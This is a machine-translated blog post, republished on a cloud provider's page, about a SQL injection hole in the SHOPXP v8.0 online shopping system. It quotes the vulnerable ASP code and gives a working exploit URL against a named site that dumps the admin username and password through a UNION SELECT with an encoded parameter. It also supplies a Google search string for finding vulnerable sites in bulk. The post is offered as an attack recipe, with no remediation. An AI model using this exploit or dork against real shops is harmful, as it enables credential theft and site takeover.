SHOPXP Online Shopping System v8.0 injection vulnerability Exploitation

Source: Internet
Author: User

Affection s blog

Last time I talked about SHOPXP's Online Shopping System's injection vulnerability 7.4 and the new version. Let's look at the 8.0

The mall systems are similar to each other. Vulnerabilities are the same as those of Wangqu. However, it is useless to add a maple leaf anti-injection service.

The newsid variable on the TEXTBOX2.ASP TEXTBOX3.ASP page is judgment

  1. Action = LCase (Request. QueryString ("Action "))
  2. NewsID = Request. QueryString ("newsID ")
  3. If request ("action") = "modify" Then
  4. Set rs = server. createobject ("adodb. recordset ")
  5. SQL = "select * from shopxp_news where newsid =" & newsid
  6. Rs. open SQL, conn, 1, 1
  7. If Not rs. Eof Then
  8. Content = rs ("newscontent ")
  9. End If
  10. Response. Write Content
  11. End If


Construct URL injection.

Exp:
Http://www.gn918.cn/TEXTBOX2.ASP? Action = modify & news % 69d = 122% 20and % 201 = 2% 20 union % 20 select % 201, 2, admin % 2 bpassword, 4,5, 6,7% 20 from % 20shopxp_admin

Batch
Google: inurl: shopxp_news.asp

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.